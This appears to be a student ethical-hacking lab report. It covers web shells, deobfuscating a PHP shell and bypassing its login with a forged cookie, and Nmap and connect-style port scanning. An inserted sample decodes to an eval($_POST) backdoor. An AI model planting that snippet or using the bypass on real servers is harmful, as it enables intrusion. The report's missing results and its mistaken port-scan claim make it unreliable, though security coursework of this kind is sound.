Ethical Hacking and Defence Report: Case Study Penetration Analysis

Added on 2023/06/03
Executive Summary
This project aims to penetrate the provided case study and produce an ethical hacking report. The project is divided into five flags, covering the following aspects: examining the web server contents, learning about web shells, cracking the password with a password cracking tool, detecting a user entering a wrong password by using port scan techniques, and learning basic Linux privilege escalation. These flags are carried out and discussed in detail below.
Table of Contents
Project Objective (p. 3)
Methodology and Testing Log (p. 3)
1.1 Flag 1) Examine the web server contents (p. 4)
1.2 Flag 2) Learn web shells (p. 4)
1.3 Flag 3) Crack Password on Web shell (p. 6)
1.4 Flag 4) Port Scanner (p. 8)
1.5 Flag 5) Learn basic Linux Privilege (p. 11)
Results and Recommendations (p. 12)
Source code for tools used (p. 12)
1.6 NMAP – TCP port Scanner (p. 12)
1.7 Password Cracker (p. 13)
References (p. 14)
Project Objective
The main goal of this project is to penetrate the provided case study and produce an ethical hacking report. The project is divided into five flags, covering the following aspects: examining the web server contents, learning about web shells, cracking the password with a password cracking tool, detecting a user entering a wrong password by using port scan techniques, and learning basic Linux privilege escalation. These flags are carried out and discussed in detail. In the password cracking flag, we deobfuscate a web shell and show how its authentication can be bypassed when you have the source code but not the password. In the port scanning flag, we use the Nmap port scanning tool to scan the TCP ports on the system. These processes are demonstrated and discussed in detail.
Methodology and Testing Log
Each flag is completed by following the steps below.
First, the provided case study must be installed and configured on a virtual machine. This process is demonstrated below.
1.1 Flag 1) Examine the web server contents
A web server needs to store the files of the site: all the HTML documents along with their supporting assets, which may also include the following (Makan, 2014):
CSS stylesheets
Fonts
JavaScript files
Videos
Images or pictures, and so on.
It is possible to store all of the files mentioned above on an ordinary PC. It is, however, common practice to store them on a dedicated web server, because that brings the following advantages: the web server is constantly connected to the Internet, it always has the same IP address, it is always running, it can be shielded from outside providers, and it is reliable ("Privilege Escalation on Linux with Live examples", 2018).
1.2 Flag 2) Learn web shells
A web shell is a malicious script used by an attacker with the aim of escalating and maintaining persistent access on an already compromised web application. Web shells cannot attack or exploit a remote vulnerability, so they are always the second step of an attack. An attacker can abuse common vulnerabilities, for instance SQL injection, RFI, FTP, or even use XSS as part of a social engineering attack, with the ultimate goal of uploading the malicious script (Prodromou, 2018). Typical functionality includes, but is not limited to, shell command execution, code execution, database enumeration and file management. Web shells are an overlooked part of cybercrime and do not attract the level of attention of either phishing or malware. When web shells first appeared, the limit of their utility was to transfer files and execute arbitrary shell commands. However, the best-built web shells now provide top-of-the-line, sophisticated toolkits for various crimes, with facilities for phishing, spamming and DDoS, not only accessible through a web user interface but also accepting commands as part of a botnet. The first step with a web shell is uploading it to a server, from which the attacker can then access it. This installation can happen in several different ways, but the most common methods include exploiting a vulnerability in the server's software, gaining access to an administrator portal, or taking advantage of an improperly configured host ("Web Shell Archive | PHP & ASP & ASPX Web Root Backdoors", 2018).
Zombie
Another use of web shells is to make servers part of a botnet. A botnet is a network of compromised systems that an attacker controls, either to use themselves or to rent out to other criminals. The web shell or backdoor is connected to a command-and-control server from which it receives instructions on which commands to execute. This setup is commonly used in DDoS attacks, which require large amounts of bandwidth. In this case, the attacker has no interest in harming or stealing anything from the system on which the web shell was deployed. Rather, they will simply use its resources whenever required.
Escalation of Privilege
Unless a server is misconfigured, the web shell will run under the web server user's permissions, which are limited. Using a web shell, an attacker can attempt privilege escalation attacks by exploiting local vulnerabilities on the system to obtain root privileges, which on Linux and other UNIX-based operating systems is the superuser. With access to the root account, the attacker can essentially do anything on the system, including installing software, changing permissions, adding and removing users, stealing passwords, reading emails and more ("Web Shells 101: Detection and Prevention", 2018).
Persistent Remote Access
A web shell usually contains a backdoor which allows an attacker to remotely access and possibly control a server at any time. This saves the attacker the trouble of exploiting a vulnerability each time access to the compromised server is required. An attacker may also fix the vulnerability themselves, in order to ensure that no one else will exploit that weakness. This way the attacker can stay under the radar and avoid any interaction with an administrator, while still obtaining the same result. It is also worth mentioning that several well-known web shells use password authentication and other techniques to ensure that only the attacker uploading the web shell has access to it. Such techniques include binding the script to a specific custom HTTP header, specific cookie values, specific IP addresses, or a combination of these. Most web shells also contain code to identify and block search engines from indexing the shell and, consequently, blacklisting the domain or server the web application is hosted on; in other words, stealth is essential ("Web Shells – Threat Awareness and Guidance", 2018).
Launching and Pivoting Attacks
A web shell can be used for pivoting inside or outside a network. The attacker may want to monitor the network traffic on the system, scan the internal network to discover live hosts, and enumerate firewalls and routers within the network. This process can take days, even months, usually because the attacker typically tries to stay under the radar and draw as little attention as possible. Once an attacker has persistent access, they can patiently make their moves. The compromised system can also be used to attack or scan targets that reside outside the network. This adds an additional layer of anonymity for the attacker, since they are using a third-party system to launch an attack. Going further, they can pivot through multiple systems to make it very hard to trace an attack back to its source ("Web Shells: The Criminal's Control Panel | Netcraft", 2018).
1.3 Flag 3) Crack Password on Web shell
When a website is hacked, the attacker usually leaves a backdoor or web shell in order to easily access the site again later. These are often obfuscated to avoid detection, and require authentication so that only the attacker can access the site. In this task, I am going to deobfuscate a web shell and show how the authentication can be bypassed when you have the source code but not the password ("What are web shells – Tutorial", 2018).
Web shell Deobfuscating
The preg_replace call has three arguments: the regex, the replacement and the subject. Since the regex has the e modifier, PHP will evaluate whatever is in the replacement as PHP code. This is therefore equivalent to the following code:
Now we know that the second parameter is evaluated, but it still does not look like PHP code. That is because it is hex encoded. A string in double quotes can contain some escape sequences that are interpreted by PHP, and one of them is \x, which places a character in the string using hexadecimal notation. For example, \x65 would be an e, because that is what the ASCII table says. Manually converting this string would be a bit of work, so we let PHP do it:
Bypassing authentication
The $auth_pass in the main code already suggested there would be authentication on the web shell. The form of $auth_pass, 32 hexadecimal characters, suggests that it is an MD5 of the plaintext password. Since we have the source of the web shell, we can confirm that:
It computes an MD5 over the posted pass parameter and checks it against $auth_pass. Plain MD5s are generally not a very secure way to store passwords. In particular, MD5 is fast, and you can compute billions of hashes per second to try to brute-force the password. Also, the MD5 sums of many weak passwords are already on the web and can be found with a quick Google search. In our case, however, the developer picked a fairly good password, and I was not able to crack it. Nevertheless, there is another way to access the web shell now that we have the source code. As you can see in the code, it sets a specific cookie when you get the password right. It checks the cookie and, if you have it wrong, it calls wsoLogin to show you a login page and exits the script. Otherwise it continues with the web shell code. The cookie is expected to have the MD5 of the hostname as its key and the $auth_pass content as its value. Luckily, we know both of these values and can create our own cookie to access the web shell.
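The two analysis steps described in this flag (decoding the hex-escaped replacement that the /e modifier evaluates, and checking whether the 32-hex $auth_pass is the MD5 of a guessable password), as an added Python example that is not part of the original report: the PHP snippet, its hash and the wordlist are constructed, and the parser assumes double-quoted string arguments as in that sample.

```python
import hashlib
import re

# Constructed sample in the style described above (not the case study's shell):
# preg_replace() with the deprecated /e modifier, whose replacement argument is
# hex-escaped so the evaluated code is not readable in the file, plus an
# $auth_pass holding the MD5 of a constructed password ("password").
SAMPLE_PHP = r'''<?php
$auth_pass = "5f4dcc3b5aa765d61d8327deb882cf99";
preg_replace("/.*/e", "\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x22\x63\x22\x5d\x29\x3b", ".");
?>'''
# Constructed wordlist standing in for the dictionaries a cracker would use.
WORDLIST = ["123456", "admin", "letmein", "password"]

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
# Assumes both arguments are double-quoted string literals, as in the sample.
PREG_CALL = re.compile(r'preg_replace\s*\(\s*"([^"]*)"\s*,\s*"((?:[^"\\]|\\.)*)"', re.S)
AUTH_PASS = re.compile(r"\$auth_pass\s*=\s*['\"]([0-9a-fA-F]{32})['\"]")


def decode_php_hex(s):
    """Expand PHP double-quoted backslash-x escapes (PHP accepts 1 or 2 hex digits)."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_eval_modifier_calls(php):
    """Return (pattern, decoded replacement) for each preg_replace whose regex uses /e."""
    hits = []
    for m in PREG_CALL.finditer(php):
        pattern, replacement = m.group(1), m.group(2)
        delimiter = pattern[0]                       # first char opens the regex
        modifiers = pattern.rsplit(delimiter, 1)[1]  # flags after the closing one
        if "e" in modifiers:
            hits.append((pattern, decode_php_hex(replacement)))
    return hits


def extract_auth_hash(php):
    """Pull the 32-hex $auth_pass constant, which the text identifies as an MD5."""
    m = AUTH_PASS.search(php)
    return m.group(1).lower() if m else None


def dictionary_check(md5_hex, wordlist):
    """Return the candidate whose unsalted MD5 equals md5_hex, or None.
    Shows why a plain MD5 of a guessable password is no real protection."""
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == md5_hex:
            return candidate
    return None


def analyse(php, wordlist):
    """Summarise the indicators an analyst wants from a suspected web shell."""
    auth_hash = extract_auth_hash(php)
    return {
        "eval_calls": find_eval_modifier_calls(php),
        "auth_hash": auth_hash,
        "weak_password": dictionary_check(auth_hash, wordlist) if auth_hash else None,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_PHP, WORDLIST).items():
        print(f"{key}: {value}")
```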
Update
Finally, the passwords below were cracked.
1.4 Flag 4) Port Scanner
Port scanning is a technique used to identify whether a port on the target host is open or closed; a port is open if there is a service that uses that specific port to communicate with other systems. This is why, if a port is open, it is eventually possible to identify what kind of service uses it by sending specially crafted packets to the target. Once we know the target IP address we can launch the port scan. By default, if no option is chosen, Nmap runs a TCP SYN scan, also called a stealth scan ("Advanced Port Scanner – free and quick port scanner", 2018). Most of the scan types are only available to privileged users. This is because they send and receive raw packets, which requires root access on UNIX systems. Using an administrator account on Windows is recommended, though Nmap sometimes works for unprivileged users on that platform when Nmap has already been loaded into the OS ("Nmap Cheat Sheet and Pro Tips | HackerTarget.com", 2018). Requiring root privileges was a serious limitation when Nmap was released in 1997, as many users only had access to shared shell accounts. Now, the world is different. Computers are cheaper, far more people have always-on direct Internet access, and desktop UNIX systems (including Linux and Mac OS X) are prevalent. A Windows version of Nmap is now available, allowing it to run on even more desktops. For all these reasons, users have less need to run Nmap from limited shared shell accounts. This is fortunate, as the privileged options make Nmap far more powerful and flexible. To understand this kind of scan it is useful to recall the TCP 3-way handshake, which describes the way a TCP connection starts.
TCP Scan
A TCP SYN scan works as follows: system A, which represents our attacking machine, sends a SYN to the target system B and waits for the SYN-ACK. If B responds, which means the port is open, A does not send the final ACK. If A does not receive the SYN-ACK the port can be either closed or filtered (this can indicate the presence of a firewall). In this way we have performed a TCP port scan without establishing a full connection with the target.
Continuing and specifying:
Open port: A sends SYN to B and B responds with SYN-ACK;
Closed port: A sends SYN to B and B responds with RST-ACK;
Filtered port: A sends SYN to B, but does not get a response or gets an ICMP port unreachable error message.
Even though this type of scan is the default one, we can set it explicitly with the "-sS" parameter followed by the IP address of the target ("TCP Port Scan with Nmap | Pentest-Tools.com", 2018):
Nmap, if not told otherwise, sets the scan to probe the most common ports, more than 950 of them, and probes them in random order. As can be seen from the results, we have scanned more than 950 ports in 0.30 seconds; 937 of them are reported as closed, and for the open ones Nmap gives us information about the service that is running on them ("Tcp Port Scanner (Free)", 2018).
For all these reasons, users have less need to run Nmap from limited shared shell accounts. This is fortunate, as the privileged options make Nmap far more powerful and flexible. While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines. Such hosts may be untrustworthy and send responses intended to confuse or mislead Nmap. Much more common are non-RFC-compliant hosts that do not respond as they should to Nmap probes. FIN, NULL, and Xmas scans are particularly susceptible to this problem. Such issues are specific to certain scan types and so are discussed in the individual scan type entries.
TCP SYN scan
SYN scan is the default and most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. SYN scan works against any compliant TCP stack rather than depending on the behaviour of specific platforms as Nmap's FIN, NULL, Xmas and idle scans do. It also allows clear, reliable differentiation between the open, closed, and filtered states. This technique is often referred to as half-open scanning, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection, and then wait for a response. A SYN/ACK indicates the port is listening (open), while a RST is indicative of a non-listener. If no response is received after several retransmissions, the port is marked as filtered. The port is also marked filtered if an ICMP unreachable error is received. The port is also considered open if a SYN packet is received in response. This can be due to an extremely rare TCP feature known as a simultaneous open or split handshake connection.
TCP connect scan
TCP connect scan is the default TCP scan type when SYN scan is not an option. This is the case when a user does not have raw packet privileges. Instead of writing raw packets as most other scan types do, Nmap asks the underlying operating system to establish a connection with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection. It is part of a programming interface known as the Berkeley Sockets API. Rather than reading raw packet responses off the wire, Nmap uses this API to obtain status information on each connection attempt.
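The open, closed and filtered states described above, as seen through the connect system call rather than raw SYN packets: an added Python example that is neither Nmap nor the report's own tool, and that targets a constructed listener on 127.0.0.1 so it runs offline and without root.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def probe_port(host, port, timeout=1.0):
    """Classify one port the way a connect scan does, using only the
    Berkeley Sockets API (no raw packets, so no root needed):
      open     - connect() completed the full three-way handshake
      closed   - the host answered with RST (ConnectionRefusedError)
      filtered - nothing came back before the timeout, or an ICMP
                 unreachable surfaced as a socket error
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except (socket.timeout, OSError):
            return "filtered"


def connect_scan(host, ports, timeout=1.0, workers=32):
    """Scan the given ports concurrently; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return dict(zip(ports, states))


def summarise(results):
    """Count ports per state, like the 'N closed ports' line Nmap prints."""
    summary = {"open": 0, "closed": 0, "filtered": 0}
    for state in results.values():
        summary[state] += 1
    return summary


def start_local_listener():
    """Open a listener on an ephemeral loopback port as a constructed target,
    so the demo stays on 127.0.0.1 and runs offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


if __name__ == "__main__":
    srv = start_local_listener()
    listening = srv.getsockname()[1]
    # Scan a small window around the listener: one open port, neighbours closed.
    ports = list(range(listening - 2, listening + 3))
    results = connect_scan("127.0.0.1", ports, timeout=0.5)
    for port in sorted(results):
        print(f"{port}/tcp {results[port]}")
    print(summarise(results))
    srv.close()
```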
1.5 Flag 5) Learn basic Linux Privilege
This flag is used to gain knowledge about basic Linux privilege escalation. The areas to examine are listed below ("Basic Linux Privilege Escalation", 2018):
Operating System
File Systems
Preparation & Finding Exploit Code
Applications & Services
Communications & Networking
Confidential Information & Users
Results and Recommendations
This project successfully penetrated the provided case study and produced the ethical hacking report. The project was divided into five flags, covering the following aspects: examining the web server contents, learning about web shells, cracking the password with a password cracking tool, detecting a user entering a wrong password by using port scan techniques, and learning basic Linux privilege escalation. These flags were successfully demonstrated and discussed in detail. In the password cracking flag, we deobfuscated a web shell and showed how its authentication can be bypassed when you have the source code but not the password. In the port scanning flag, we used the Nmap port scanning tool to successfully scan the TCP ports on the system. These processes were demonstrated and discussed in detail.
Source code for tools used
1.6 NMAP – TCP port Scanner
To scan the TCP ports with Nmap, use the command below ("Port Scanning Techniques | Nmap Network Scanning", 2018).
nmap <ip address>
nmap 192.168.1.1
It delivers the results below.
1.7 Password Cracker
The source code is attached here.
Run the PHP code on Kali Linux (Valentino, 2018). It reveals the hidden password.
References
Advanced Port Scanner – free and fast port scanner. (2018). Retrieved from http://www.advanced-port-scanner.com/
Basic Linux Privilege Escalation. (2018). Retrieved from https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Makan, K. (2014). Penetration Testing with the Bash shell. Packt Publishing.
Nmap Cheat Sheet and Pro Tips | HackerTarget.com. (2018). Retrieved from https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/
Port Scanning Techniques | Nmap Network Scanning. (2018). Retrieved from https://nmap.org/book/man-port-scanning-techniques.html
Privilege Escalation on Linux with Live examples. (2018). Retrieved from https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/
Prodromou, A. (2018). An Introduction to Web-shells - Part 1 | Acunetix. Retrieved from https://www.acunetix.com/blog/articles/introduction-web-shells-part-1/
TCP Port Scan with Nmap | Pentest-Tools.com. (2018). Retrieved from https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
Tcp Port Scanner (Free). (2018). Retrieved from http://www.mylanviewer.com/port-scanner.html
Valentino, V. (2018). PHP Web Shell and Stealth Backdoor : Weevely 2. Retrieved from https://www.hacking-tutorial.com/hacking-tutorial/php-web-shell-and-stealth-backdoor-weevely/
Web Shell Archive | PHP & ASP & ASPX Web Root Backdoors. (2018). Retrieved from https://webshell.co/
Web Shells 101: Detection and Prevention. (2018). Retrieved from https://blog.rapid7.com/2016/12/14/webshells-101/
Web Shells – Threat Awareness and Guidance. (2018). Retrieved from https://www.us-cert.gov/ncas/alerts/TA15-314A
Web Shells: The Criminal's Control Panel | Netcraft. (2018). Retrieved from https://news.netcraft.com/archives/2017/05/18/web-shells-the-criminals-control-panel.html
What are web shells – Tutorial. (2018). Retrieved from https://www.binarytides.com/web-shells-tutorial/